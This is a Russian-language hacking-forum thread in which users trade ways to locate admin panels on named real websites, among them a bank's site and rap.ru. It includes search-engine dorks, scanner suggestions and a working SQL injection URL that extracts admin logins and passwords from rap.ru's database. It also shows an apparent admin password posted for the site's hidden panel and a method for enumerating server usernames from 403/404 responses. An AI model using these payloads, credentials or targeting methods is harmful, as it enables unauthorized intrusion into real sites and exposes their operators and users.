Вопрос по обнаружению админок на сайте

Народ, подскажите какие есть способы найти админку на сайте, очень интересует, много всего перепробовал...
Есть сайт msk-bank.ru, никак не могу найти

 

первым делом проверь на robots.txt, затем поскань структуру сайта сканером, можно пройтись поисковиком, ручной подбор также использовать можно.

 

главный способ по обнаружению админок это inurl:"site" inurl:"admin"
но по ходу на сайте msk-bank.ru нет админки , мож я ошибаюсь

 

тогда уж лучше inurl:"admin" site:'site'

 

Сканер директорий юзать надо)

Не знаю, что в пабле валяется нормальное, но при наличии хорошей базы-словаря можно найти много чего)

 

название сканера можно в студию?

 

Писал вещичку на питоне.. легкие сайты с широких каналов валит

Ps Пробей домены на этом же айпи/хосте, можт у админки адрес другой. врятли бы и другой айпи ей давали
хотя я гемороился пару раз )

 

В избранном на античате есть pelmeshka сканер. вообще их ооочень много. выбирай на вкус. я иногда юзаю nikto

 

http://forum.antichat.ru/thread40031.html

 

rap.ru
На данном сайте существует бага, скуль
http://www.rap.ru/page.php?path=/survey&survey_id=-1+union+select+1,2,concat(Nick,char(58),Passwd),4+from+Admins/*
а также есть админка
http://www.rap.ru/admin

Однако пароли не подходят, поиск других админок ничего не дал, может кто родскажет, что к чему и почему ничего не получается?

P.S. сканирование Nikto дало помимо всего такой результат -
+ /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET).
Не совсем понимаю, что это значит.

 

Termin@L, бага такая...коннектишься к серверу на 22 порту (кажеца, если не прав - поправьте), и можешь перебирать логины вот так: /~admin /~vasya. Т.е. можно узнать имя юзера.

 

тебе ответили в этой теме что делать, а ты неудосужился прочитать..

http://www.rap.ru/robots.txt

Code:

     User-agent: *
     Disallow: /_Includes
[COLOR=yellow]     Disallow: /_Admin[/COLOR]
     Disallow: /_Images
     Disallow: /_Files
     Disallow: /_Templates
     Disallow: /_Style

http://www.rap.ru/_Admin/
Administrator:nfnec

 

Спасибо большое, извиняюсь, забыл

 

А какой дурак будет в robots прописывать закрытые разделы?! Я на своих сайтах подобные разделы закрываю от индексирования поисковиков с помощью мета-тегов. Да и админки у меня вида Mfi8ernj58j, тем более найти парадный вход эт одно, далее взломать его над))

 

дураки дураками, а тем не менее, адреса админок в robots.txt встречаются очень часто при наличии этого файла.
Тем более, от SQL на сайте никто не застрахован, и твой пароль можно достать при использовании админкой sql-базы.

 

как это на 22 порт? если ты по SSH приконектился, то в подавляющем большинстве случаев пользователей можно посмотреть в /etc/passwd

Ну тоесть можно подобрать имена пользователей... если ответ сервера 403 (Forbidden) значит пользователь существует, если 404 (not found) значит такого несуществует... например ecли зайти http://www.rap.ru/~vasya и серв ответит 403 (Forbidden) (или зайдет по этому адресу) значит пользователь vasya точно существует, а если 404 (not found) то пользователя vasya может не быть...